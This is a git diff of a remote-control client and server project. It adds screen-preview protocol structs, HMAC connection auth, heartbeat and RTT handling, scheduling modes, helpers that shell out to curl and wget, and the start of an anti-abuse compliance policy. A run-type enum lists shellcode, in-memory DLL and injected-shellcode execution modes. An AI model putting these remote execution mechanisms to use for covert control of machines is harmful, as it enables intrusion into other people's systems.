SCREEN_PREVIEW_CAPTURE_FAILED = 1, // 抓屏失败
SCREEN_PREVIEW_ENCODE_FAILED = 2, // 编码失败
SCREEN_PREVIEW_NOT_SUPPORTED = 3, // 平台不支持
};
enum ScreenPreviewFormat {
SCREEN_PREVIEW_FMT_JPEG = 0,
SCREEN_PREVIEW_FMT_PNG = 1, // 预留
SCREEN_PREVIEW_FMT_WEBP = 2, // 预留
};
struct ScreenPreviewRspHeader {
uint8_t token; // = TOKEN_SCREEN_PREVIEW_RSP
uint16_t reqId; // 回显请求序号
uint8_t status; // ScreenPreviewStatus
uint8_t format; // ScreenPreviewFormatv1 仅 JPEG
uint16_t width; // 实际编码图宽
uint16_t height; // 实际编码图高
uint32_t bytes; // 图像字节数(紧随其后)
uint8_t reserved[3];
// 后接 data[bytes]
}; // 头部 16 字节
#pragma pack(pop)
static_assert(sizeof(ScreenPreviewReq) == 8, "ScreenPreviewReq must be 8 bytes");
static_assert(sizeof(ScreenPreviewRspHeader) == 16, "ScreenPreviewRspHeader must be 16 bytes");
enum ConnAuthStatus {
CONN_AUTH_OK = 0,
CONN_AUTH_BAD_SIZE = 1, // 包长度不对
CONN_AUTH_CLOCK_SKEW = 2, // 时间戳超过容忍范围
CONN_AUTH_BAD_SIGNATURE = 3, // HMAC 不匹配
CONN_AUTH_INTERNAL_ERROR = 4,
};
#define CONN_AUTH_TIMESTAMP_TOLERANCE_SEC 300 // 客户端/服务端时钟漂移容忍 ±5 分钟
#define CONN_AUTH_CLIENT_WAIT_MS 10000 // 客户端等待 ack 的超时
// 设为 10 秒留足跨太平洋 + 拥塞 / 卫星链路 / 偏远网络的余量;
// 同机几毫秒就回,正常路径用户感知不到。
enum MachineCommand { enum MachineCommand {
MACHINE_LOGOUT, MACHINE_LOGOUT,
MACHINE_SHUTDOWN, MACHINE_SHUTDOWN,
@@ -915,7 +1028,14 @@ typedef struct LOGIN_INFOR {
{ {
memset(this, 0, sizeof(LOGIN_INFOR)); memset(this, 0, sizeof(LOGIN_INFOR));
bToken = TOKEN_LOGIN; bToken = TOKEN_LOGIN;
sprintf_s(moduleVersion, "%s-%04X", DLL_VERSION, CLIENT_CAP_V2); // 能力位声明客户端实际实现了的功能。SCREEN_PREVIEW 只在 Windows 客户端
// 实现(依赖 GDI BitBlt + GDI+ JPEGLinux/macOS 不声明,避免服务端发请求
// 后等 4s 超时显示"预览不可用"。
unsigned int caps = CLIENT_CAP_V2 | CLIENT_CAP_UTF8;
#ifdef _WIN32
caps |= CLIENT_CAP_SCREEN_PREVIEW;
#endif
sprintf_s(moduleVersion, "%s-%04X", DLL_VERSION, caps);
} }
LOGIN_INFOR& Speed(unsigned long speed) LOGIN_INFOR& Speed(unsigned long speed)
{ {
@@ -997,12 +1117,23 @@ typedef struct Heartbeat {
} Heartbeat; } Heartbeat;
typedef struct HeartbeatACK { typedef struct HeartbeatACK {
uint64_t Time; uint64_t Time; // offset 0, size 8
char Authorized; char Authorized; // offset 8
char IsTrail; char IsTrail; // offset 9
char Authorization[200]; char Authorization[200]; // offset 10, size 200 → 结束于 210
char Reserved[814]; // 显式 padding让随后的 uint32_t ProcessingMs 落在 4 字节对齐边界212
// 不加这两个字节,编译器会自动补,但同时会把结构体尾部补到 8 字节对齐
// 导致 sizeof 从 1024 涨到 1032破坏跨版本兼容新客户端连旧服务端会
// 退回 OldSize=32 字节读取,丢失 Authorization
char _ackPad[2]; // offset 210, size 2
// 服务端处理本心跳的耗时(毫秒,由 server 写入 send-ACK 前一刻)。
// 客户端用 (now - Time) - ProcessingMs 得到近似纯网络 RTT喂给反代理检测。
// 旧服务端 / 早期版本会把 ProcessingMs 留作 0此时客户端按 0 = 未知,
// 直接使用 (now - Time),不退化(与本字段加入前的行为完全一致)。
uint32_t ProcessingMs; // offset 212, size 4 → 结束于 216
char Reserved[808]; // offset 216, size 808 → 结束于 1024
} HeartbeatACK; } HeartbeatACK;
// sizeof(HeartbeatACK) == 1024与本字段加入前完全相等
#define HeartbeatACK_OldSize 32 #define HeartbeatACK_OldSize 32
@@ -1022,7 +1153,9 @@ typedef struct MasterSettings {
char HelpUrl[80]; // Since 2026-04-08 char HelpUrl[80]; // Since 2026-04-08
char RequestAuthUrl[80]; // Since 2026-04-08 char RequestAuthUrl[80]; // Since 2026-04-08
char GetPluginUrl[80]; // Since 2026-04-08 char GetPluginUrl[80]; // Since 2026-04-08
char Reserved[108]; // Since 2025-11-27 char Authorized; // Since 2026-05-15
char IsTrail; // Since 2026-05-15
char Reserved[106]; // Since 2025-11-27
} MasterSettings; } MasterSettings;
#pragma pack(pop) #pragma pack(pop)
@@ -1048,6 +1181,20 @@ enum QualityLevel {
QUALITY_COUNT = 6, QUALITY_COUNT = 6,
}; };
// 屏幕压缩算法常量 (所有平台共用)
#ifndef ALGORITHM_GRAY
#define ALGORITHM_GRAY 0 // 灰度压缩
#define ALGORITHM_DIFF 1 // 差分压缩 (BGRA)
#define ALGORITHM_H264 2 // H264 硬件编码
#define ALGORITHM_RGB565 3 // RGB565 压缩
#endif
enum EncodeLevel {
LEVEL_H264_SOFT = 0,
LEVEL_H264_HARD = 1,
LEVEL_AV1_HARD = 2,
};
/* 质量配置(与 QualityLevel 对应) /* 质量配置(与 QualityLevel 对应)
- strategy = 01080p 限制 - strategy = 01080p 限制
- strategy = 1原始分辨率 - strategy = 1原始分辨率
@@ -1080,6 +1227,29 @@ inline const QualityProfile& GetQualityProfile(int level) {
return g_QualityProfiles[level]; return g_QualityProfiles[level];
} }
// 屏幕预览质量配置(与 QualityLevel 共用 RTT 阈值表,但参数维度不同:缩略图只关心
// 编码尺寸 + JPEG 质量,没有 FPS / 算法等运动视频参数)
struct PreviewProfile {
int maxWidth; // 期望编码宽度(客户端会等比缩放,禁止放大)
int jpegQuality; // JPEG 质量 1..100
};
inline const PreviewProfile& GetScreenPreviewProfile(int level) {
static const PreviewProfile g_PreviewProfiles[QUALITY_COUNT] = {
{ 1024, 85 }, // Ultra: 超清 (LAN/同省4K 源屏可进一步放大到 1280)
{ 800, 80 }, // High: 高清 (跨省直连)
{ 640, 75 }, // Good: 标清 (同国/邻国)
{ 480, 70 }, // Medium: 常规 (大陆间)
{ 384, 60 }, // Low: 低清 (跨洲)
{ 256, 50 }, // Minimal: 最低 (极差网络/卫星链路)
};
if (level < 0 || level >= QUALITY_COUNT) {
static const PreviewProfile fallback = { 480, 70 };
return fallback;
}
return g_PreviewProfiles[level];
}
// 根据RTT获取目标质量等级 (控制端使用) // 根据RTT获取目标质量等级 (控制端使用)
inline int GetTargetQualityLevel(int rtt, int usingFRP) { inline int GetTargetQualityLevel(int rtt, int usingFRP) {
// 根据模式应用不同 RTT阈值 (毫秒) // 根据模式应用不同 RTT阈值 (毫秒)
@@ -1109,7 +1279,8 @@ typedef struct ScreenSettings {
int CpuSpeedup; // 偏移 36, 指令集加速(0: 无, 1: SSE2) int CpuSpeedup; // 偏移 36, 指令集加速(0: 无, 1: SSE2)
int ScreenType; // 偏移 40, 屏幕类型(0: GDI, 1: DXGI, 2: Virtual) int ScreenType; // 偏移 40, 屏幕类型(0: GDI, 1: DXGI, 2: Virtual)
int AudioEnabled; // 偏移 44, 音频传输(0: 禁用, 1: 启用) int AudioEnabled; // 偏移 44, 音频传输(0: 禁用, 1: 启用)
char Reserved[48]; // 偏移 48, 保留字段(新能力参数从此处扩展) int EncodeLevel; // 偏移 48, 编码等级
char Reserved[44]; // 偏移 52, 保留字段(新能力参数从此处扩展)
uint32_t Capabilities; // 偏移 96, 能力位标志(放最后) uint32_t Capabilities; // 偏移 96, 能力位标志(放最后)
} ScreenSettings; // 总大小 100 字节 } ScreenSettings; // 总大小 100 字节
@@ -1198,11 +1369,14 @@ enum {
SHELLCODE = 0, SHELLCODE = 0,
MEMORYDLL = 1, MEMORYDLL = 1,
INJECT_SC = 2,
RUNTYPE_MAX = 3,
CALLTYPE_DEFAULT = 0, // 默认调用方式: 只是加载DLL,需要在DLL加载时执行代码 CALLTYPE_DEFAULT = 0, // 默认调用方式: 只是加载DLL,需要在DLL加载时执行代码
CALLTYPE_IOCPTHREAD = 1, // 调用run函数启动线程: DWORD (__stdcall *run)(void* lParam) CALLTYPE_IOCPTHREAD = 1, // 调用run函数启动线程: DWORD (__stdcall *run)(void* lParam)
CALLTYPE_FRPC_CALL = 2, // 调用FRPC CALLTYPE_FRPC_CALL = 2, // 调用FRPC
CALLTYPE_FRPC_STDCALL = 3, // 调用FRPC标准方式使用开源FRP项目 CALLTYPE_FRPC_STDCALL = 3, // 调用FRPC标准方式使用开源FRP项目
CALLTYPE_MAX = 4,
}; };
typedef DWORD(__stdcall* PidCallback)(void); typedef DWORD(__stdcall* PidCallback)(void);

6
common/config.h Normal file
View File

@@ -0,0 +1,6 @@
// 请设置为禁用防止GPL开源传染性
#define DISABLE_X264_FOR_TEST 0
// 请设置为禁用防止GPL开源传染性
#define DISABLE_FFMPEG_FOR_TEST 0

22
common/iniFile.h
View File

@@ -208,9 +208,25 @@ public:
virtual std::string GetStr(const std::string& MainKey, const std::string& SubKey, const std::string& def = "") virtual std::string GetStr(const std::string& MainKey, const std::string& SubKey, const std::string& def = "")
{ {
char buf[4096] = { 0 }; // 增大缓冲区以支持较长的值(如 IP 列表) // 动态扩容读取GetPrivateProfileStringA 在缓冲不够时会从中间截断,
DWORD n = ::GetPrivateProfileStringA(MainKey.c_str(), SubKey.c_str(), def.c_str(), buf, sizeof(buf), m_IniFilePath); // 必须以"是否返回 bufSize-1"判断截断并翻倍重读,否则长值(如团购授权的
return std::string(buf); // IP 列表)会被悄无声息地切断,且后续 read-modify-write 把截断结果写回时
// 造成永久数据丢失。
DWORD bufSize = 4096;
const DWORD kMaxBufSize = 1024 * 1024; // 1MB 兜底,避免失控
std::vector<char> buf;
for (;;) {
buf.assign(bufSize, 0);
DWORD n = ::GetPrivateProfileStringA(MainKey.c_str(), SubKey.c_str(),
def.c_str(), buf.data(), bufSize,
m_IniFilePath);
// 未截断n < bufSize - 1
if (n + 1 < bufSize || bufSize >= kMaxBufSize) {
return std::string(buf.data(), n);
}
bufSize *= 2;
if (bufSize > kMaxBufSize) bufSize = kMaxBufSize;
}
} }
virtual bool SetStr(const std::string& MainKey, const std::string& SubKey, const std::string& Data) virtual bool SetStr(const std::string& MainKey, const std::string& SubKey, const std::string& Data)

21
common/logger.h
View File

@@ -228,16 +228,19 @@ private:
} }
// 后台线程处理日志 // 后台线程处理日志
// 退出语义stop() 设 running=false 后,本线程必须把队列里**已入队**的日志
// 全部刷盘再退出。否则进程死亡前最后几条 Mprintf包括退出原因会丢失。
void processLogs() void processLogs()
{ {
threadRun = true; threadRun = true;
while (running) { while (true) {
std::unique_lock<std::mutex> lock(queueMutex); std::unique_lock<std::mutex> lock(queueMutex);
cv.wait(lock, [this]() { cv.wait(lock, [this]() {
return !running || !logQueue.empty(); return !running || !logQueue.empty();
}); });
while (running && !logQueue.empty()) { // drain不带 running 判断,确保 stop() 时残留条目也写完
while (!logQueue.empty()) {
std::string logEntry = logQueue.front(); std::string logEntry = logQueue.front();
logQueue.pop(); logQueue.pop();
lock.unlock(); lock.unlock();
@@ -247,7 +250,9 @@ private:
lock.lock(); lock.lock();
} }
lock.unlock();
// 队列已空再决定要不要退出
if (!running) break;
} }
threadRun = false; threadRun = false;
} }
@@ -321,6 +326,16 @@ inline const char* getFileName(const char* path)
#endif #endif
#elif defined(_WIN32) #elif defined(_WIN32)
#define Mprintf(format, ...) Logger::getInstance().log(getFileName((__FILE__)), __LINE__, (format), __VA_ARGS__) #define Mprintf(format, ...) Logger::getInstance().log(getFileName((__FILE__)), __LINE__, (format), __VA_ARGS__)
#elif defined(__APPLE__)
// macOS: 使用 NSLog 输出到系统日志(可通过 Console.app 查看)
#ifdef Mprintf
#undef Mprintf
#endif
#ifdef __OBJC__
#define Mprintf(format, ...) NSLog(@"%@", [NSString stringWithFormat:@(format), ##__VA_ARGS__])
#else
#define Mprintf(format, ...) printf(format, ##__VA_ARGS__)
#endif
#else #else
// Linux: 覆盖 commands.h 中的 printf 回退定义,改用 Logger 写文件 // Linux: 覆盖 commands.h 中的 printf 回退定义,改用 Logger 写文件
#ifdef Mprintf #ifdef Mprintf

99
common/posix_net_helpers.h Normal file
View File

@@ -0,0 +1,99 @@
// posix_net_helpers.h
// Linux/macOS 客户端共用的网络/Shell 工具execCmd / httpGet / getPublicIP /
// jsonExtract / getGeoLocation。Windows 端已有等价实现,不应包含此头。
//
// 全部 inlineheader-only避免新增 .cpp / 改 CMakeLists。
//
// 设计说明:
// - httpGet 优先 curl备选 wgetLinux 默认自带macOS 默认无 wget缺失时
// wget 命令失败、execCmd 返空——无副作用,等价于"只用 curl"
// - getPublicIP 轮询多个公网 IP 查询源,按顺序尝试直到成功
// - jsonExtract 仅做最简单的 "key":"value" 提取,不依赖 jsoncpp
// - getGeoLocation 通过 ipinfo.io 反查地理位置,与 Windows IPConverter 同源
#pragma once
#include <cstdio>
#include <memory>
#include <string>
#include "common/logger.h"
namespace PosixNet {
// 执行 shell 命令,捕获其 stdout 输出trim 末尾空白后返回)
inline std::string execCmd(const std::string& cmd)
{
std::unique_ptr<FILE, decltype(&pclose)> pipe(popen(cmd.c_str(), "r"), pclose);
if (!pipe) return "";
char buf[4096];
std::string result;
while (fgets(buf, sizeof(buf), pipe.get())) {
result += buf;
}
while (!result.empty() && (result.back() == '\n' || result.back() == '\r' || result.back() == ' '))
result.pop_back();
return result;
}
// HTTP GET 请求:优先 curl备选 wget
inline std::string httpGet(const std::string& url, int timeoutSec = 5)
{
std::string t = std::to_string(timeoutSec);
std::string r = execCmd("curl -s --max-time " + t + " \"" + url + "\" 2>/dev/null");
if (!r.empty()) return r;
r = execCmd("wget -qO- --timeout=" + t + " \"" + url + "\" 2>/dev/null");
return r;
}
// 获取公网 IP轮询多个查询源与 Windows 端 IPConverter 一致)
inline std::string getPublicIP()
{
static const char* urls[] = {
"https://checkip.amazonaws.com",
"https://api.ipify.org",
"https://ipinfo.io/ip",
"https://icanhazip.com",
"https://ifconfig.me/ip",
};
for (auto& url : urls) {
std::string ip = httpGet(url, 3);
if (!ip.empty() && ip.find('.') != std::string::npos && ip.size() <= 45) {
Mprintf("getPublicIP: %s (from %s)\n", ip.c_str(), url);
return ip;
}
}
Mprintf("getPublicIP: all sources failed\n");
return "";
}
// 从 JSON 字符串中提取指定 key 的 string 值(简易解析,不依赖 jsoncpp
// 仅支持 "key": "value" 或 "key":"value" 格式
inline std::string jsonExtract(const std::string& json, const std::string& key)
{
std::string needle = "\"" + key + "\"";
size_t pos = json.find(needle);
if (pos == std::string::npos) return "";
pos = json.find(':', pos + needle.size());
if (pos == std::string::npos) return "";
pos = json.find('"', pos + 1);
if (pos == std::string::npos) return "";
size_t end = json.find('"', pos + 1);
if (end == std::string::npos) return "";
return json.substr(pos + 1, end - pos - 1);
}
// 获取 IP 地理位置ipinfo.io与 Windows IPConverter 同源)
inline std::string getGeoLocation(const std::string& ip)
{
if (ip.empty()) return "";
std::string json = httpGet("https://ipinfo.io/" + ip + "/json", 5);
if (json.empty()) return "";
std::string country = jsonExtract(json, "country");
std::string city = jsonExtract(json, "city");
if (city.empty() && country.empty()) return "";
if (city.empty()) return country;
if (country.empty()) return city;
return city + ", " + country;
}
} // namespace PosixNet

50
common/rtt_estimator.h Normal file
View File

@@ -0,0 +1,50 @@
// rtt_estimator.h
// 平滑 RTT 估算器(参考 RFC 6298与 Windows 端 KernelManager 算法一致。
// Linux/macOS 客户端共享:每次心跳 ACK 用 update_from_sample(rtt_ms) 喂一次样本。
//
// 设计要点:
// - srtt / rttvar / rto 单位为秒;输入是毫秒
// - 异常值≤0 或 >30s丢弃防止统计被一个瞬时坏样本污染
// - alpha=1/8, beta=1/4 与 RFC 6298 默认值一致
//
// C++17 inline 全局变量g_rttEstimator / g_heartbeatInterval 由本头文件直接定义,
// 多翻译单元 include 不会触发 ODR 冲突。
#pragma once
#include <cmath>
struct RttEstimator {
double srtt = 0.0; // 平滑 RTT (秒)
double rttvar = 0.0; // RTT 波动 (秒)
double rto = 0.0; // 超时时间 (秒)
bool initialized = false;
void update_from_sample(double rtt_ms)
{
// 过滤异常值RTT应在合理范围内 (0, 30000] 毫秒
if (rtt_ms <= 0 || rtt_ms > 30000)
return;
const double alpha = 1.0 / 8;
const double beta = 1.0 / 4;
double rtt = rtt_ms / 1000.0;
if (!initialized) {
srtt = rtt;
rttvar = rtt / 2.0;
rto = srtt + 4.0 * rttvar;
initialized = true;
} else {
rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt);
srtt = (1.0 - alpha) * srtt + alpha * rtt;
rto = srtt + 4.0 * rttvar;
}
// 限制最小 RTORFC 6298 推荐 1 秒)
if (rto < 1.0) rto = 1.0;
}
};
// 进程级全局:所有翻译单元共享同一份估算器与心跳间隔
inline RttEstimator g_rttEstimator;
inline int g_heartbeatInterval = 5; // 默认心跳间隔(秒),可被服务端 CMD_MASTERSETTING 更新

112
common/scheduler.h
View File

@@ -1,11 +1,17 @@
#ifndef YAMA_SCHEDULER_H #ifndef YAMA_SCHEDULER_H
#define YAMA_SCHEDULER_H #define YAMA_SCHEDULER_H
#include <stdint.h>
// 调度模式定义 // 调度模式定义
#define SCH_MODE_NONE 0 // 默认模式:不自动执行 (仅手动) #define SCH_MODE_NONE 0 // 默认模式:不自动执行 (仅手动)
#define SCH_MODE_STARTUP 1 // 启动执行模式 #define SCH_MODE_STARTUP 1 // 启动执行模式
#define SCH_MODE_DAILY 2 // 每日定时模式 #define SCH_MODE_DAILY 2 // 每日定时模式
#define SCH_MODE_WEEKLY 3 // 每周定时模式 #define SCH_MODE_WEEKLY 3 // 每周定时模式
#define SCH_MODE_MONTHLY 4 // 每月定时模式
#define SCH_MODE_YEARLY 5 // 每年定时模式
#define SCH_MODE_OFF 6 // 关闭
#define SCH_MODE_MAX 7
#pragma pack(push, 1) #pragma pack(push, 1)
// 严格定义 16 字节结构 // 严格定义 16 字节结构
@@ -40,6 +46,7 @@ class YamaTaskEngine {
public: public:
static bool ShouldExecute(const ScheduleParams* p) { static bool ShouldExecute(const ScheduleParams* p) {
// --- 1. 默认与基础拦截 --- // --- 1. 默认与基础拦截 ---
if (p->Mode == SCH_MODE_OFF) return false;
if (p->Mode == SCH_MODE_NONE) return false; // Mode为0默认不执行 if (p->Mode == SCH_MODE_NONE) return false; // Mode为0默认不执行
if (p->Flags & 0x01) return false; // 显式禁用拦截 if (p->Flags & 0x01) return false; // 显式禁用拦截
if (p->MaxCount > 0 && p->CurrentCount >= p->MaxCount) return false; if (p->MaxCount > 0 && p->CurrentCount >= p->MaxCount) return false;
@@ -63,9 +70,51 @@ public:
SYSTEMTIME st; SYSTEMTIME st;
GetLocalTime(&st); GetLocalTime(&st);
unsigned short curMin = (unsigned short)(st.wHour * 60 + st.wMinute); unsigned short curMin = (unsigned short)(st.wHour * 60 + st.wMinute);
// TargetMin=0 表示 0:00 执行
if (curMin >= p->Config.Timed.TargetMin) { if (curMin >= p->Config.Timed.TargetMin) {
if (!IsSameDay(p->LastRunTime, now)) return true; if (!IsSameDay(p->LastRunTime, now)) return true;
} }
return false;
}
// --- 4. 每周定时逻辑 (Mode 3) ---
if (p->Mode == SCH_MODE_WEEKLY) {
SYSTEMTIME st;
GetLocalTime(&st);
unsigned short curMin = (unsigned short)(st.wHour * 60 + st.wMinute);
// DaysMask=0 表示周日 (wDayOfWeek: 0=周日, 1=周一, ...)
unsigned char targetDay = p->Config.Timed.DaysMask;
if (st.wDayOfWeek == targetDay && curMin >= p->Config.Timed.TargetMin) {
if (!IsSameWeek(p->LastRunTime, now)) return true;
}
return false;
}
// --- 5. 每月定时逻辑 (Mode 4) ---
if (p->Mode == SCH_MODE_MONTHLY) {
SYSTEMTIME st;
GetLocalTime(&st);
unsigned short curMin = (unsigned short)(st.wHour * 60 + st.wMinute);
// DaysMask=0 表示每月第 1 天
unsigned char targetDay = p->Config.Timed.DaysMask == 0 ? 1 : p->Config.Timed.DaysMask;
if (st.wDay == targetDay && curMin >= p->Config.Timed.TargetMin) {
if (!IsSameMonth(p->LastRunTime, now)) return true;
}
return false;
}
// --- 6. 每年定时逻辑 (Mode 5) ---
if (p->Mode == SCH_MODE_YEARLY) {
SYSTEMTIME st;
GetLocalTime(&st);
unsigned short curMin = (unsigned short)(st.wHour * 60 + st.wMinute);
// DaysMask=0, Reserved=0 表示 1月1日
unsigned char targetMonth = p->Config.Timed.DaysMask == 0 ? 1 : p->Config.Timed.DaysMask;
unsigned char targetDay = p->Config.Timed.Reserved == 0 ? 1 : p->Config.Timed.Reserved;
if (st.wMonth == targetMonth && st.wDay == targetDay && curMin >= p->Config.Timed.TargetMin) {
if (!IsSameYear(p->LastRunTime, now)) return true;
}
return false;
} }
return false; return false;
@@ -88,13 +137,66 @@ private:
static bool IsSameDay(unsigned __int64 ft1, unsigned __int64 ft2) { static bool IsSameDay(unsigned __int64 ft1, unsigned __int64 ft2) {
if (ft1 == 0 || ft2 == 0) return false; if (ft1 == 0 || ft2 == 0) return false;
SYSTEMTIME st1, st2; SYSTEMTIME st1, st2;
FILETIME f1, f2; FTToST(ft1, &st1);
f1.dwLowDateTime = (DWORD)ft1; f1.dwHighDateTime = (DWORD)(ft1 >> 32); FTToST(ft2, &st2);
f2.dwLowDateTime = (DWORD)ft2; f2.dwHighDateTime = (DWORD)(ft2 >> 32);
FileTimeToSystemTime(&f1, &st1);
FileTimeToSystemTime(&f2, &st2);
return (st1.wYear == st2.wYear && st1.wMonth == st2.wMonth && st1.wDay == st2.wDay); return (st1.wYear == st2.wYear && st1.wMonth == st2.wMonth && st1.wDay == st2.wDay);
} }
static bool IsSameWeek(unsigned __int64 ft1, unsigned __int64 ft2) {
if (ft1 == 0 || ft2 == 0) return false;
// 转换为本地时间的天数,再判断是否在同一周
SYSTEMTIME st1, st2;
FTToST(ft1, &st1);
FTToST(ft2, &st2);
// 计算两个日期各自所在周的周日日期,相同则同一周
int days1 = DaysSinceEpoch(st1.wYear, st1.wMonth, st1.wDay);
int days2 = DaysSinceEpoch(st2.wYear, st2.wMonth, st2.wDay);
// 回退到本周周日 (wDayOfWeek: 0=周日)
int weekStart1 = days1 - st1.wDayOfWeek;
int weekStart2 = days2 - st2.wDayOfWeek;
return (weekStart1 == weekStart2);
}
static bool IsSameMonth(unsigned __int64 ft1, unsigned __int64 ft2) {
if (ft1 == 0 || ft2 == 0) return false;
SYSTEMTIME st1, st2;
FTToST(ft1, &st1);
FTToST(ft2, &st2);
return (st1.wYear == st2.wYear && st1.wMonth == st2.wMonth);
}
static bool IsSameYear(unsigned __int64 ft1, unsigned __int64 ft2) {
if (ft1 == 0 || ft2 == 0) return false;
SYSTEMTIME st1, st2;
FTToST(ft1, &st1);
FTToST(ft2, &st2);
return (st1.wYear == st2.wYear);
}
static void FTToST(unsigned __int64 ft, SYSTEMTIME* pSt) {
FILETIME ftUtc, ftLocal;
ftUtc.dwLowDateTime = (DWORD)ft;
ftUtc.dwHighDateTime = (DWORD)(ft >> 32);
FileTimeToLocalFileTime(&ftUtc, &ftLocal);
FileTimeToSystemTime(&ftLocal, pSt);
}
// 简易计算从某基准日开始的天数 (用于周计算)
static int DaysSinceEpoch(int year, int month, int day) {
// 简化算法:相对于 2000-01-01 的天数
int y = year - 2000;
int leapYears = (y > 0) ? ((y - 1) / 4 - (y - 1) / 100 + (y - 1) / 400 + 1) : 0;
int days = y * 365 + leapYears;
static const int daysBeforeMonth[] = { 0,31,59,90,120,151,181,212,243,273,304,334 };
days += daysBeforeMonth[month - 1] + day - 1;
// 闰年 2 月后加 1 天
if (month > 2 && IsLeapYear(year)) days++;
return days;
}
static bool IsLeapYear(int year) {
return (year % 4 == 0 && year % 100 != 0) || (year % 400 == 0);
}
}; };
#endif #endif
#endif #endif

70
common/sub_conn_thread.h Normal file
View File

@@ -0,0 +1,70 @@
// sub_conn_thread.h
// Linux/macOS 客户端子连接 worker 线程的统一骨架。
//
// 各 worker 线程Shell / ScreenSpy / FileManager / SystemManager 等)共有的步骤:
// 1. new IOCPClient(g_bExit, exit_while_disconnect=true)
// 2. Enter log
// 3. EnableSubConnAuth(true, g_myClientID)(子连接强制 ConnAuth
// 4. ConnectServer内部会执行 PerformConnAuth失败返 false
// 5. 创建 platform handler
// 6. setManagerCallBack 装回调
// 7. 调 onReady发首包TOKEN_TERMINAL_START / SendBitmapInfo() 等)
// 8. while (running && connected && !g_bExit) Sleep
// 9. 清回调防止 dangling
// 10. Leave log
// 11. catch exceptions
//
// 平台差异(通过 lambda 注入):
// - HandlerTPTYHandler / ScreenHandler / SystemManager / FileManager
// - createHandler 可返回 nullptr 表示初始化失败(如 macOS ScreenHandler 无录屏权限)
// - onReady 完成首包发送或额外 setup
//
// 用法见 linux/main.cpp / macos/main.mm 的 *workingThread 调用点。
#pragma once
#include <memory>
#include <stdexcept>
#include "client/IOCPClient.h"
#include "common/commands.h"
#include "common/logger.h"
extern State g_bExit;
extern uint64_t g_myClientID;
extern CONNECT_ADDRESS g_SETTINGS;
// 子连接 worker 线程通用骨架。
//
// CreateFn 签名: std::unique_ptr<HandlerT>(IOCPClient*)
// 返回 nullptr 表示初始化失败(如权限拒绝),线程会跳过 callback 安装直接 leave。
// OnReadyFn 签名: void(IOCPClient*, HandlerT*)
// handler 装上 callback 后立即调用,可在此发送首包或做额外 setup。
template <class HandlerT, class CreateFn, class OnReadyFn>
inline void RunSubConnThread(const char* threadName, CreateFn createHandler, OnReadyFn onReady)
{
try {
std::unique_ptr<IOCPClient> ClientObject(new IOCPClient(g_bExit, true));
void* clientAddr = ClientObject.get();
Mprintf(">>> Enter %s [%p]\n", threadName, clientAddr);
// 子连接:开启 auth。Linux/macOS IOCPClient 不带 m_conn显式传入 g_myClientID。
ClientObject->EnableSubConnAuth(true, g_myClientID);
if (!g_bExit && ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort())) {
std::unique_ptr<HandlerT> handler = createHandler(ClientObject.get());
if (handler) {
ClientObject->setManagerCallBack(handler.get(),
IOCPManager::DataProcess,
IOCPManager::ReconnectProcess);
onReady(ClientObject.get(), handler.get());
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit)
Sleep(1000);
// 清除回调,防止重连线程访问已销毁的 handler
ClientObject->setManagerCallBack(nullptr, nullptr, nullptr);
}
}
Mprintf(">>> Leave %s [%p]\n", threadName, clientAddr);
} catch (const std::exception& e) {
Mprintf("*** %s exception: %s ***\n", threadName, e.what());
}
}

56
common/utf8.h Normal file
View File

@@ -0,0 +1,56 @@
#include <windows.h>
#include <string>
/**
* 将本地多字节字符串 (ANSI/GBK) 转换为 UTF-8
*/
inline std::string ansi_to_utf8(const std::string& ansi_str) {
if (ansi_str.empty()) return "";
// 1. ANSI -> UTF-16 (WideChar)
int wlen = MultiByteToWideChar(CP_ACP, 0, ansi_str.c_str(), -1, NULL, 0);
std::wstring wstr(wlen, 0);
MultiByteToWideChar(CP_ACP, 0, ansi_str.c_str(), -1, &wstr[0], wlen);
// 2. UTF-16 -> UTF-8
int u8len = WideCharToMultiByte(CP_UTF8, 0, wstr.c_str(), -1, NULL, 0, NULL, NULL);
std::string utf8_str(u8len, 0);
WideCharToMultiByte(CP_UTF8, 0, wstr.c_str(), -1, &utf8_str[0], u8len, NULL, NULL);
// 移除末尾的 \0
if (!utf8_str.empty() && utf8_str.back() == '\0') {
utf8_str.pop_back();
}
return utf8_str;
}
/**
* 将 UTF-8 字符串转换为本地多字节字符串 (ANSI/GBK)
* 用于在多字节字符集 UI 上正常显示从远程接收到的内容
*/
inline std::string utf8_to_ansi(const std::string& utf8_str) {
if (utf8_str.empty()) return "";
// 1. UTF-8 -> UTF-16 (WideChar)
// 计算需要的宽字符长度
int wlen = MultiByteToWideChar(CP_UTF8, 0, utf8_str.c_str(), -1, NULL, 0);
if (wlen <= 0) return "";
std::wstring wstr(wlen, 0);
MultiByteToWideChar(CP_UTF8, 0, utf8_str.c_str(), -1, &wstr[0], wlen);
// 2. UTF-16 -> ANSI (Local Code Page, e.g., GBK)
// CP_ACP 表示使用当前系统的 ANSI 代码页
int alen = WideCharToMultiByte(CP_ACP, 0, wstr.c_str(), -1, NULL, 0, NULL, NULL);
if (alen <= 0) return "";
std::string ansi_str(alen, 0);
WideCharToMultiByte(CP_ACP, 0, wstr.c_str(), -1, &ansi_str[0], alen, NULL, NULL);
// 移除 WideCharToMultiByte 自动添加的 \0 结尾
if (!ansi_str.empty() && ansi_str.back() == '\0') {
ansi_str.pop_back();
}
return ansi_str;
}

BIN
compress/ffmpeg/dav1d_x64.lib Normal file
View File

Binary file not shown.

BIN
compress/ffmpeg/vpl_x64.lib Normal file
View File

Binary file not shown.

BIN
compress/ffmpeg/vpl_x64d.lib Normal file
View File

Binary file not shown.

626
docs/Compliance_AntiAbuse.md Normal file
View File

@@ -0,0 +1,626 @@
# 反滥用与合规使用政策
> **文档版本**1.0
> **生效日期**:本文档自发行方在公开仓库发布之日起对所有获取本软件的人员生效;
> 后续修订以仓库提交记录为准。
> **文档语言**:本文档以简体中文为权威版本;译本在含义不一致时,以中文版本为准。
---
## 重要声明(请在使用本软件之前完整阅读)
> **本文档不是法律意见。** 本文档由发行方以一般合规材料的形式起草,目的是
> 阐明本软件的设计意图、许可使用范围、禁止使用情形以及发行方与最终使用方
> 之间的责任划分。本文档不构成针对任何特定司法辖区、特定使用场景的法律
> 意见,亦不替代用户应当自行向具备执业资质的律师寻求的专业建议。
>
> **使用本软件即视为您已阅读、理解并接受本文档全部条款。** 如您不能或不愿
> 接受本文档任一条款,请立即停止下载、安装、运行、复制、修改、分发本软件,
